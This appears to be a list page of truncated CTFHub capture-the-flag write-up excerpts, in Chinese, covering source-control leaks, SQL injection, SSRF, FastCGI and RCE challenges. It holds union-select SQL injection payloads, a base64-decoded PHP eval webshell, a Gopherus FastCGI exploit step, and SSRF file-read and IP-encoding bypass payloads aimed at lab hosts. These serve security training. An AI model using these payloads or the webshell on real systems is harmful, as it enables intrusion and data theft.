• 2024-08-14Git泄露--------Log
    步骤一:虚拟机运行命令:python2GitHack.py后跟网址http://challenge-d9ebdd73f20fda85.sandbox.ctfhub.com:10800/.git步骤二:切换到dist文件下步骤三:查看目录下内容:ls-la步骤四:进入.dist目录下:cd.git步骤五:输入命令查找:gitshow步骤六:复制内容提交FlagStash
  • 2024-08-14CTFHub~SQL注入超简单详细教程
    0x01整数型注入#本题告诉我们是整数型,所以就很容易了#判断字段数量1orderby2#判断回显点-1unionselect1,2#查询全部数据库名-1unionselect1,group_concat(schema_name)frominformation_schema.schemata#判断数据库中的表名-1unionselec
  • 2024-08-13ctfhub UA头注入,refer,过滤空格
    -1unionselect1,database()id=-1unionselect1,group_concat(table_name)frominformation_schema.tableswheretable_schema=database()id=-1unionselect1,group_concat(column_name)frominformation_schema.columnswheretable_schema=database()andta
  • 2024-08-01ctfhub-sql注入-injection-解题思路
    1.打开题目,判断是数字型注入还是字符型注入    1.输入1’  //无回显        1‘ --+//也是没有回显        1”  //无回显        1“--= //无回显都没有回显,所以判断为数字型注入2.使用命令进行判断
  • 2024-07-26【CTFHub】FastCGI协议
    第一步:开启环境后,打开kali虚拟机,第二步:生成一句话木马echo"PD9waHAgQGV2YWwoJF9QT1NUW2NtZF0pOz8+"|base64-d>shell.php第三步:Gopherus-master工具文件中打开终端,输入以下代码python2gopherus.py--exploitfastcgi 第四步将kali里面生成的代码复制进CTF在
  • 2024-07-25CTFHUB-SQL注入-1
    对于sql注入类型的题,首先判断注入点尝试发现注入点为?id=1'发现联合注入无法回显,尝试使用sqlmap先进行扫描sqlmap-u"http://challenge-1559e706c24187fa.sandbox.ctfhub.com:10800/?id=1'" 查询dbssqlmap-u"http://challenge-1559e706c24187fa.sandbox.ctfhub.co
  • 2024-07-25CTFHub技能树 Web-SSRF系列通过全技巧(已完结)
    1.内网访问url后面输入http://127.0.0.1/flag.php,得到Flag2.伪协议读取文件url后面输入file:///var/www/html/flag.php,然后右击页面查看页面源代码,得到Flag3.端口扫描第一步:在url后面输入http://127.0.0.1:5000,对本页面抓包,右击抓包界面,发送到Intruder第二
  • 2024-07-24web专项
    CTF-WEB-CTFhub注:以ctfhub练习网站为例!一:信息泄露1、目录遍历漏洞(1)原理:web服务器或者web应用程序对用户输入的文件名称未进行严格的验证过滤而导致的一种安全漏洞;让攻击者可以利用一些特殊的字符可以绕过服务器的安全限制、访问任意文件;就是没有过滤用户输入的./等目录跳跃符
  • 2024-07-24CTFHub-SSRF解析合集
    内网访问直接使用http://访问内网获取flag数据伪协议读取文件使用file://绝对路径读取flag.php数据,需要查看网页源代码使用file://绝对路径读取flag.php数据,需要查看网页源代码端口扫描1.打开靶场后访问随机一个端口,抓包2.将抓到的包发送到攻击
  • 2024-07-07CTFHUB-彩蛋教程
    目录1.首页2.公众号3.题目入口4.writeup5.工具6.赛事7.真题8.投稿提交6:1212:1818:2424:3030:3636:4242:481.首页根据提示,在原始首页查看页面源代码,无发现,经过不断尝试,发现访问api.ctfhub.com有回显api.ctfhub.com右键查看页面源代码,CTRL+F
  • 2024-07-07CTFHUB-SSRF-302跳转 Bypass
    开启题目,页面空白尝试访问127.0.0.1/flag.php页面?url=127.0.0.1/flag.php提示:不允许企业内部IP访问,使用file协议获取其源码,得到flag.php页面源码?url=file:///var/www/html/flag.php与之前一样,通过REMOTE_ADDR请求头限制本地IP请求,源码中并没有之前的hacker!BanI
  • 2024-07-07CTFHUB-SSRF-数字IP Bypass
    开启题目,页面空白根据提示,不能使用点分十进制,尝试将127.0.0.1转换为十六进制形式,也就是0x7f000001构造题目有所需Payload?url=0x7f000001/flag.php访问得到了flag八进制:0177.000.000.001十进制:127.0.0.1十六进制:0x7f000001进制转换网址:https://www.bchrt.com/tools
  • 2024-07-07CTFHUB-SSRF-URL Bypass
    开启题目给出提示,url参数的值中必须包含有http://notfound.ctfhub.com,可以采用@,也就是HTTP基本身份认证绕过HTTP基本身份认证允许Web浏览器或其他客户端程序在请求时提供用户名和口令形式的身份凭证的一种登录验证方式。也就是:http://[email protected]
  • 2024-06-22Crypto(18)——CTFHub
    栅栏解救signinlittleRSA脚本:点击查看代码importmodc=32949n=64741e=42667p=Noneforiinrange(2,n):ifn%i==0:p=ibreakq=n//pem=mod.Mod(e,(p-1)*(q-1))d=int(1//em)cm=mod
  • 2024-06-22Misc(17)——CTFHub
    Gradientsky下载题目附件,是一张图片:查看属性:无重要信息,拖入010中,搜索ctf,得到flag:word文件本质下载附件,是一个word文件,打开一堆文字:楚人居贫,读《淮南子》,得“螳螂伺蝉自障叶,可以隐形”,大喜。遂于树下仰望,欲觅螳螂伺蝉自障叶。偶见之,即缘而摘之,然不慎叶落树下。树下先有落
  • 2024-06-11CTFHUB技能树之WEB前置技能HTTP协议
    CTFHUB技能树WEB前置技能/HTTP协议请求方式根据提示可知,通过修改请求方式获取flag使用BurpSuite进行拦截,将GET方法改为CTFHUB方法即可。得到flag。302跳转打开BurpSuite进行拦截,将第一次请求发给重发器再次发送,得出flagCookie打开页面,得出提示信息,需要admin,将Cook
  • 2024-06-03CTFHUB-信息泄露-目录遍历和PHPINFO
    目录目录遍历PHPINFO目录遍历很简单,挨着把每个目录都点开看一下发现2目录下有个flag.txt文件,点开发现了本关的flagPHPINFO这关也很简单,进来之后是一个phpinfo页面,按CTRL+F键打开查询,输入flag,查找到了本关的flag 
  • 2024-06-03CTFHUB-密码口令-弱口令
    目录题干介绍密码字典找flag过程尾声题干介绍通常认为容易被别人(他们有可能对你很了解)猜测到或被破解工具破解的口令均为弱口令。密码字典下载地址:GitHub-NepoloHebo/Commonly-used-weak-password-dictionary:常用弱密码字典包含了常见且容易猜测的密码组合。
  • 2024-06-03CTFHUB-信息泄露-SVN泄露和HG泄露
    目录SYN泄露方法1方法2HG泄露这两关我们需要用到一个泄露利用工具dvcs-riCpper和Perl环境,没有的就去下载,kali没有自带SYN泄露当开发人员使用SVN进行版本控制,对站点自动部署。如果配置不当,可能会将.svn文件夹直接部署到线上环境。这就引起了SVN泄露漏洞。因
  • 2024-05-12CTFHUB-PHP-bypass_disable_functions
    很多可以蚁剑插件自己做,因为本来就是蚁剑实验室的靶场,这里有些也就用手工方法,方便掌握原理。LD_PRELOAD看题目一眼环境变量劫持。蚁剑可以连,但是终端命令全被ban了。访问/?ant=phpinfo();查看禁用函数:pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,
  • 2024-04-23[CTFHUB]HG 文件泄露
    ./rip-hg.pl-v-uhttp://challenge-dbc16a24dc341259.sandbox.ctfhub.com:10800/.hg/hj@tux:~/dvcs-ripper/.hg$grep"flag"./-arn./undo.dirstate:1:{b:�j��>���ӾC��ca��������flag_2931217588.txtn���^c50x.htmln��
  • 2024-04-23[CTFHUB]SVN泄露
    使用dvcs-ripper工具gitclonehttps://github.com/kost/dvcs-ripper.gitsudoapt-getinstallperllibio-socket-ssl-perllibdbd-sqlite3-perllibclass-dbi-perllibio-all-lwp-perl#安装依赖./rip-svn.pl-v-uhttp://challenge-3791c896116904b4.sandbox.ctfhub.co
  • 2024-04-22[ctfhub] git 泄漏
    题目描述当前大量开发人员使用git进行版本控制,对站点自动部署。如果配置不当,可能会将.git文件夹直接部署到线上环境。这就引起了git泄露漏洞。请尝试使用BugScanTeam的GitHack完成本题实验环境这里使用的是Ubuntu22.04.4LTS的环境sudoaptinstallgitsudoaptinstallp
  • 2024-04-04CTFHub(web RCE)
    目录RCE命令注入方法一:方法二:方法三:注意:过滤cat过滤空格过滤目录分隔符过滤运算符综合过滤练习文件包含php://input远程包含读取源代码方法一:方法二:方法三:eval执行RCE(remotecommand/codeexecute,远程命令执行)命令执行一般发生在远程,故被称为远程命
  • 2024-02-27CTFHUB-web-信息泄露-目录遍历
    开启靶场http://challenge-a4aa9ff53d890618.sandbox.ctfhub.com:10800/查看此处源代码,没有发现有用信息点击开始寻找flag挨个点几个目录寻找flag在目录1/2下发现了flag提交一手,直接成功。可以参考此链接(纯小白,无教程思路有限)https://www.cnblogs.com/quail2333/p/12